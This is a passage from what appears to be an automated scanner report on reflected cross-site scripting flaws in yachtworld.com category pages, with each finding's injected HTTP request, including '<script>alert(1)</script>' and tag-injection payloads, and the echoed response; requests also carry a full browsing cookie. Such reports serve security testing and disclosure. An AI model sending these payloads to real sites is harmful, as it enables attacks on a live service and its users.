Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Catalina/1eb8b8"><script>alert(1)</script>6a854ab519a/A-1">
...[SNIP]...

3.218. http://www.yachtworld.com/boats/category/type/Chaparral/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Chaparral/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd788"><a>e946f402836 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/typecd788"><a>e946f402836/Chaparral/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:52 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/typecd788"><a>e946f402836/Chaparral/1">
...[SNIP]...

3.219. http://www.yachtworld.com/boats/category/type/Chaparral/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Chaparral/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9360a"><a>e02b50f0e07 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Chaparral9360a"><a>e02b50f0e07/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:01 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Chaparral9360a"><a>e02b50f0e07/A-1">
...[SNIP]...

3.220. http://www.yachtworld.com/boats/category/type/Chaparral/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Chaparral/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80034"><script>alert(1)</script>166b0f28f90 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Chaparral/180034"><script>alert(1)</script>166b0f28f90 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:09 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Chaparral/180034"><script>alert(1)</script>166b0f28f90/A-1">
...[SNIP]...

3.221. http://www.yachtworld.com/boats/category/type/Chris+Craft/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Chris+Craft/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6577d"><a>d7175243dd9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type6577d"><a>d7175243dd9/Chris+Craft/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:41 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/type6577d"><a>d7175243dd9/Chris+Craft/1">
...[SNIP]...

3.222. http://www.yachtworld.com/boats/category/type/Chris+Craft/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Chris+Craft/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4247a"><a>354e0610b4d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Chris+Craft4247a"><a>354e0610b4d/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:48 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
